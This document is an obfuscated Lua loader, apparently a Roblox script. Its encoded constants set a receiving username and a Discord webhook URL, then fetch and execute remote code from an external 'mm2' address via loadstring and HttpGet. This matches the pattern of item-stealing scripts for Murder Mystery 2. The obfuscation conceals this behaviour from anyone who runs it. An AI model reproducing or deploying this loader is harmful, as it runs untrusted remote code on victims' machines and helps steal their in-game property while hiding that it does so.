--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v81,v19);v19=nil;v98=1;end end else return v81;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/(2^(v32-((879 -(282 + 595)) -1))))%(((1642 -(1523 + 114)) -3)^(((v33-(1 -0)) -(v32-(2 -1))) + ((98 + 522) -(555 + 64)))) ;return v82-(v82%(932 -(857 + 74))) ;else local v83=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v83 + v83))>=v83) and 1) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1273 -(226 + 1044)) );v18=v18 + 4 ;return (v40 * (73054774 -56277558)) + (v39 * (64226 + 1310)) + (v38 * (373 -(32 + 85))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,958 -(892 + 65) ,47 -27 ) * ((3 -1)^(58 -(56 -30)))) + v41 ;local v45=v20(v42,371 -(87 + 263) ,211 -(67 + 113) );local v46=((v20(v42,6 + 26 )==(1 + 0)) and  -(2 -1)) or ((1 -0) + 0) ;if (v45==(0 -0)) then if (v44==(952 -(802 + 150))) then return v46 * (0 -0) ;else local v87=0 -0 ;while true do if (v87==(0 + 0 + 0)) then v45=998 -((1706 -(368 + 423)) + 82) ;v43=0;break;end end end elseif (v45==2047) then return ((v44==(0 -0)) and (v46 * ((1 + 0)/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/((1189 -((3359 -2290) + 118))^((135 -(10 + 8)) -65)))) ;end local function v25(v47) local v48=0 + 0 ;local v49;local v50;while true do if (v48==(0 -0)) then v49=nil;if  not v47 then local v94=1138 -((1196 -(1020 + 60)) + (2445 -(630 + 793))) ;while true do if (v94==(442 -(416 + 26))) then v47=v23();if (v47==(0 -0)) then return "";end break;end end end v48=1 + 0 ;end if (v48==((887 -(261 + 624)) + 1)) then return v6(v50);end if (v48==(3 -1)) then v50={};for v88=439 -(145 + 293) , #v49 do v50[v88]=v2(v1(v3(v49,v88,v88)));end v48=862 -(814 + (152 -107)) ;end if (v48==(431 -(44 + 386))) then v49=v3(v16,v18,(v18 + v47) -(1487 -(998 + 488)) );v18=v18 + v47 ;v48=1 + (1 -0) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 1784 -(599 + 1185) ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v65=(function() return 0 + 0 ;end)();while true do if (1~=v65) then else if ((0 + 0)==v51) then local v95=(function() return 0;end)();while true do if (v95==2) then v51=(function() return 1;end)();break;end if ((574 -(507 + 67))~=v95) then else v52=(function() return function(v126,v127,v128) local v129=(function() return 0;end)();local v130=(function() return;end)();while true do if (v129==0) then v130=(function() return 1749 -(1013 + 736) ;end)();while true do if (v130==(0 + 0)) then local v183=(function() return 0;end)();local v184=(function() return;end)();while true do if (v183==(0 -0)) then v184=(function() return 0;end)();while true do if ((0 -0)==v184) then local v190=(function() return 867 -(550 + 317) ;end)();while true do if (v190~=0) then else v126[v127-#"}" ]=(function() return v128();end)();return v126,v127,v128;end end end end break;end end end end break;end end end;end)();v53=(function() return {};end)();v95=(function() return 1 -0 ;end)();end if (v95==1) then v54=(function() return {};end)();v55=(function() return {};end)();v95=(function() return 2 -0 ;end)();end end end break;end if (v65~=(0 -0)) then else if (v51==1) then local v96=(function() return 0;end)();while true do if (v96==(286 -(134 + 151))) then v58=(function() return {};end)();for v107= #",",v57 do local v108=(function() return 0;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if (v108==1) then v111=(function() return nil;end)();while true do if (v109==1) then if (v110== #"\\") then v111=(function() return v21()~=(1665 -(970 + 695)) ;end)();elseif (v110==(3 -1)) then v111=(function() return v24();end)();elseif (v110== #"19(") then v111=(function() return v25();end)();end v58[v107]=(function() return v111;end)();break;end if (0==v109) then local v182=(function() return 0;end)();while true do if (0~=v182) then else v110=(function() return v21();end)();v111=(function() return nil;end)();v182=(function() return 1991 -(582 + 1408) ;end)();end if (v182==(3 -2)) then v109=(function() return 1 -0 ;end)();break;end end end end break;end if (v108==(0 -0)) then local v165=(function() return 0;end)();while true do if (v165==0) then v109=(function() return 1824 -(1195 + 629) ;end)();v110=(function() return nil;end)();v165=(function() return 1;end)();end if (v165~=(1 -0)) then else v108=(function() return 1;end)();break;end end end end end v96=(function() return 2;end)();end if (v96==(243 -(187 + 54))) then v51=(function() return 2;end)();break;end if ((780 -(162 + 618))==v96) then v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v96=(function() return 1;end)();end end end if (v51==(2 + 0)) then v56[ #"19("]=(function() return v21();end)();for v100= #",",v23() do local v101=(function() return v21();end)();if (v20(v101, #">", #"/")==(0 + 0)) then local v103=(function() return 0 -0 ;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v103~=(1 -0)) then else local v141=(function() return 0;end)();while true do if (v141~=1) then else v103=(function() return 2;end)();break;end if (v141==(0 + 0)) then v106=(function() return {v22(),v22(),nil,nil};end)();if (v104==0) then local v185=(function() return 1636 -(1373 + 263) ;end)();while true do if (v185~=(1000 -(451 + 549))) then else v106[ #"gha"]=(function() return v22();end)();v106[ #"?id="]=(function() return v22();end)();break;end end elseif (v104== #"|") then v106[ #"xxx"]=(function() return v23();end)();elseif (v104==(1 + 1)) then v106[ #"91("]=(function() return v23() -(2^16) ;end)();elseif (v104~= #"-19") then else local v191=(function() return 0;end)();local v192=(function() return;end)();while true do if ((0 -0)==v191) then v192=(function() return 0 -0 ;end)();while true do if (v192==(1384 -(746 + 638))) then v106[ #"91("]=(function() return v23() -((1 + 1)^16) ;end)();v106[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v141=(function() return 1;end)();end end end if (v103==(2 -0)) then if (v20(v105, #" ", #"]")== #"}") then v106[2]=(function() return v58[v106[343 -(218 + 123) ]];end)();end if (v20(v105,1583 -(1535 + 46) ,2 + 0 )== #"/") then v106[ #"91("]=(function() return v58[v106[ #"xnx"]];end)();end v103=(function() return 3;end)();end if (0==v103) then local v142=(function() return 0;end)();local v143=(function() return;end)();while true do if (v142~=(0 + 0)) then else v143=(function() return 560 -(306 + 254) ;end)();while true do if (v143~=0) then else v104=(function() return v20(v101,1 + 1 , #"19(");end)();v105=(function() return v20(v101, #"?id=",6);end)();v143=(function() return 1;end)();end if ((1 -0)==v143) then v103=(function() return 1;end)();break;end end break;end end end if (v103==3) then if (v20(v105, #"-19", #"xxx")~= #"!") then else v106[ #"http"]=(function() return v58[v106[ #"xnxx"]];end)();end v53[v100]=(function() return v106;end)();break;end end end end for v102= #":",v23() do v54,v102,v28=(function() return v52(v54,v102,v28);end)();end return v56;end v65=(function() return 1468 -(899 + 568) ;end)();end end end end local function v29(v59,v60,v61) local v62=v59[1 + 0 ];local v63=v59[740 -(542 + 196) ];local v64=v59[3];return function(...) local v66=v62;local v67=v63;local v68=v64;local v69=v27;local v70=2 -1 ;local v71= -(604 -(268 + 335));local v72={};local v73={...};local v74=v12("#",...) -(573 -(426 + 146)) ;local v75={};local v76={};for v84=0 + 0 ,v74 do if (v84>=v68) then v72[v84-v68 ]=v73[v84 + (1457 -(282 + 1174)) ];else v76[v84]=v73[v84 + (812 -((838 -269) + 242)) ];end end local v77=(v74-v68) + (2 -1) ;local v78;local v79;while true do v78=v66[v70];v79=v78[(1093 -(975 + 117)) + 0 ];if (v79<=(1561 -(1126 + 425))) then if (v79<=(1028 -(706 + 318))) then if ((v79<=(3 -2)) or (2179==2260)) then if ((3111>=2134) and (v79==(1121 -(118 + 1003)))) then local v112=v78[1253 -((2596 -(157 + 1718)) + 530) ];local v113,v114=v69(v76[v112](v13(v76,v112 + (378 -(142 + 235)) ,v78[13 -10 ])));v71=(v114 + v112) -(1272 -(945 + 326)) ;local v115=0 -0 ;for v131=v112,v71 do v115=v115 + 1 + 0 ;v76[v131]=v113[v115];end else v76[v78[702 -(271 + 429) ]]=v61[v78[3 + 0 ]];end elseif (v79<=(1502 -(1143 + 265 + (326 -234)))) then for v134=v78[1088 -(461 + 625) ],v78[1291 -(993 + (1008 -713)) ] do v76[v134]=nil;end elseif (v79==(1 + 2)) then v76[v78[1173 -(418 + 753) ]]=v78[2 + 1 ];else v61[v78[6 -3 ]]=v76[v78[1 + 1 ]];end elseif (v79<=(33 -26)) then if (v79<=(2 + 3)) then local v118=v78[1 + 1 ];v76[v118]=v76[v118](v13(v76,v118 + (530 -(406 + 123)) ,v71));elseif (v79==(1775 -(1749 + (1038 -(697 + 321))))) then do return;end else local v149=0 + 0 ;local v150;while true do if (v149==(0 + 0)) then v150=v78[1324 -(1249 + 73) ];v76[v150]=v76[v150](v13(v76,v150 + 1 + 0 ,v71));break;end end end elseif (v79<=((2012 -1273) -(476 + 255))) then local v120=v78[1147 -(466 + 679) ];local v121,v122=v69(v76[v120](v13(v76,v120 + ((3 -1) -1) ,v78[3])));v71=(v122 + v120) -(2 -1) ;local v123=1900 -(106 + 1794) ;for v136=v120,v71 do v123=v123 + 1 + 0 ;v76[v136]=v121[v123];end elseif ((2355==2355) and (v79==(2 + (15 -8)))) then v76[v78[1 + 1 + 0 ]]=v78[(14 -6) -5 ];else do return;end end elseif ((v79<=(40 -25)) or (588<=432)) then if ((4797>=3895) and (v79<=(126 -(4 + 110)))) then if (v79>(595 -(57 + 527))) then for v139=v78[1429 -(41 + 1386) ],v78[106 -((45 -28) + 86) ] do v76[v139]=nil;end elseif (v76[v78[2 + 0 ]]==v78[8 -4 ]) then v70=v70 + (2 -1) ;else v70=v78[(2734 -(322 + 905)) -(363 + 1141) ];end elseif ((3577==3577) and (v79<=((790 -(602 + 9)) -(122 + 44)))) then if (v76[v78[2 -0 ]]==v78[11 -7 ]) then v70=v70 + (3 -2) ;else v70=v78[3 + 0 ];end elseif (v79>((1192 -(449 + 740)) + 11)) then v76[v78[3 -1 ]]=v61[v78[2 + 1 ]];else v61[v78[68 -(30 + 35) ]]=v76[v78[2 + 0 ]];end elseif ((3794>3693) and (v79<=((2147 -(826 + 46)) -(1043 + 214)))) then if (v79<=(60 -44)) then v70=v78[(2162 -(245 + 702)) -(323 + 889) ];elseif (v79==(1678 -((4667 -3190) + 184))) then v76[v78[(2 + 3) -3 ]]();else local v159=580 -(361 + 219) ;local v160;local v161;while true do if ((v159==(321 -(53 + 267))) or (1275==4100)) then v76[v160 + 1 + 0 ]=v161;v76[v160]=v161[v78[417 -(15 + 398) ]];break;end if (((982 -(18 + 964))==v159) or (1591>=3580)) then v160=v78[7 -5 ];v161=v76[v78[1901 -(260 + 1638) ]];v159=(441 -(382 + 58)) + 0 ;end end end elseif (v79<=(15 + (12 -8))) then v70=v78[2 + 1 ];elseif (v79==(870 -(20 + 830))) then local v162=0;local v163;local v164;while true do if ((983<=1808) and ((1 + 0)==v162)) then v76[v163 + (1126 -(936 + 189)) ]=v164;v76[v163]=v164[v78[4]];break;end if ((v162==(0 + 0 + 0)) or (2150<=1197)) then v163=v78[1615 -(1565 + 48) ];v164=v76[v78[(3 -1) + 1 ]];v162=1139 -(782 + 356) ;end end else v76[v78[2 + 0 ]]();end v70=v70 + (127 -(116 + 10)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031B3O00682O7470733A2O2F65676F72696B7573612E73706163652F2O6D3203083O00557365726E616D65030C3O004368616B696D6F66696E613403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31322O353633353034383732303439383732392F2D367931704E3765615037784D46563642663464744F4178724B522O594963386D5773524148305132396B494145644D73724165795F434277376F7955424F78304B7175001A3O0012033O00014O0002000100013O00260D3O0002000100010004103O00020001001203000100013O00260D0001000F000100020004103O000F0001001201000200033O001201000300043O002012000300030005001203000500066O000300054O000500023O00022O00150002000100010004103O0019000100260D00010005000100010004103O00050001001203000200083O00120E000200073O0012030002000A3O00120E000200093O001203000100023O0004103O000500010004103O001900010004103O000200012O00063O00017O00",v9(),...);
